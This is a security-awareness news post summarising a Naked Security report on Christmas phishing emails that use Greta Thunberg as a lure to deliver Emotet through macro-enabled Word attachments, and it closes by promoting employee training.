A number of phishing campaigns have been using Christmas-themed emails encouraging recipients to support climate activist Greta Thunberg, according to Paul Ducklin at Naked Security. Scammers often exploit people’s charitable impulses in order to trick them into handing over their money, but these climate change-themed emails contain links or attachments meant to deliver malware. While the download links in the emails aren’t currently functional, the malicious attachments will result in the installation of the Emotet banking Trojan.
The attachments are Microsoft Word documents which, when opened, display an image with text informing the recipient that they’ll have to click the “Enable content” and “Enable editing” buttons in order to view the contents of the document. Clicking these buttons will allow the file to run a macro which will execute a PowerShell command to download the malware. Once Emotet is installed, the attackers can essentially do whatever they want with the infected computer, which often includes downloading additional malware.
While this specific attack delivered Emotet, Ducklin explains that this type of infection chain allows the attackers to customize their payload based on the target.
“Remember that when malware arrives in a multi-step chain, like here, you can never be quite sure what comes next,” Ducklin writes. “That’s one reason the crooks like to deliver their final malware payloads via a web download that happens at the time and place that your infection started. That way they can tailor the final malware not only by time, but also by your geolocation and even by what type of computer you’ve got. For example, if your laptop turns out to be a Mac, some crooks will deliberately try to hit you with Mac-specific malware instead of sending you a Windows program that isn’t going to run at all.”
Many malware attacks would be prevented if every employee knew that they should never click “Enable editing” or “Enable content” in a Microsoft Office document, especially if they’ve just received the document in an email. Even more attacks could be thwarted if employees were taught to avoid clicking on suspicious links or opening unsolicited attachments. New-school security awareness training can create a culture of security within your organization by teaching your employees about social engineering tactics.
Naked Security has the story: https://nakedsecurity.sophos.com/2019/12/27/christmas-malware-uses-support-greta-thunberg-as-a-lure/